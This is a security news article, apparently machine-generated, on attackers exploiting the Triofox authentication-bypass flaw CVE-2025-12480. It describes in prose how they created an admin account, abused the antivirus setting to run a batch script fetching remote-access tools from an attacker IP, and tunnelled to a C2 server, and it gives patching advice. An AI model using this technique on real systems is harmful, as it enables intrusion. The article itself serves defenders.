Ethical Hacking News
Google's Mandiant Threat Defense team has discovered that hackers are exploiting a critical vulnerability in Gladinet's Triofox file-sharing and remote access platform. This allows attackers to bypass authentication, access configuration pages, and potentially deploy malware via the antivirus feature. Users of the platform are advised to update to the latest version, audit admin accounts, and verify their antivirus settings to prevent potential exploitation.
Hackers exploited a critical vulnerability (CVE-2025-12480) in Gladinet's Triofox platform, allowing them to bypass authentication and access configuration pages. The attackers uploaded and executed arbitrary payloads, resulting in potential malware infections and privilege escalation. Google's Mandiant Threat Defense team discovered the vulnerability in a threat cluster tracked as UNC6485, which was weaponized nearly a month after Gladinet released patches for the flaw. The attackers created a new native admin account called Cluster Admin to conduct follow-on activities, including code execution and privilege escalation. The attackers deployed remote access programs like Zoho Assist and AnyDesk to conduct reconnaissance, change passwords, and add users to local administrators and the "Domain Admins" group for privilege escalation. The threat actors set up an encrypted tunnel to a command-and-control (C2) server over port 433 via SSH to sidestep detection.
Hackers have recently exploited a critical vulnerability in Gladinet's Triofox file-sharing and remote access platform, allowing them to bypass authentication and access configuration pages. This vulnerability, tracked as CVE-2025-12480 (CVSS score: 9.1), enables attackers to upload and execute arbitrary payloads, resulting in potential malware infections and privilege escalation.
The discovery of this vulnerability was made by Google's Mandiant Threat Defense team, which observed a threat cluster tracked as UNC6485 weaponizing the flaw as far back as August 24, 2025, nearly a month after Gladinet released patches for the flaw in version 16.7.10368.56560. This is not the first time this year that Triofox has faced exploitation; prior vulnerabilities, such as CVE-2025-30406 and CVE-2025-11371, have also been actively exploited.
The attackers, who utilized the unauthenticated access vulnerability to gain access to configuration pages, subsequently created a new native admin account, Cluster Admin. This newly created account was used by the attackers to conduct follow-on activities, including code execution, which involved logging in using the newly created Admin account and uploading malicious files via the built-in antivirus feature.
The attackers then set up the antivirus engine to point to a malicious batch script ("centre_report.bat"), designed to download an installer for Zoho Unified Endpoint Management System (UEMS) from 84.200.80[.]252, and use it to deploy remote access programs like Zoho Assist and AnyDesk on the host. The remote access afforded by Zoho Assist was then leveraged to conduct reconnaissance, followed by attempts to change passwords for existing accounts and add them to local administrators and the "Domain Admins" group for privilege escalation.
In order to sidestep detection, the threat actors downloaded tools like Plink and PuTTY to set up an encrypted tunnel to a command-and-control (C2) server over port 433 via SSH. The ultimate goal of this campaign remains unknown; however, it is recommended that Triofox users update to the latest version, audit admin accounts, and verify that Triofox's antivirus engine is not configured to execute unauthorized scripts or binaries.
The discovery of this vulnerability highlights the importance of keeping software up-to-date, as well as being vigilant in monitoring for suspicious activity. As with any security incident, prompt action can help mitigate potential damage, but a proactive approach to cybersecurity is essential for preventing vulnerabilities from becoming exploited.
Related Information:
https://www.ethicalhackingnews.com/articles/Hackers-Exploit-Triofox-Flaw-to-Install-Remote-Access-Tools-via-Antivirus-Feature-Leaving-Users-Vulnerable-to-Malware-and-Privilege-Escalation-ehn.shtml
https://thehackernews.com/2025/11/hackers-exploiting-triofox-flaw-to.html
https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480
Published: Mon Nov 10 15:26:56 2025 by llama3.2 3B Q4_K_M
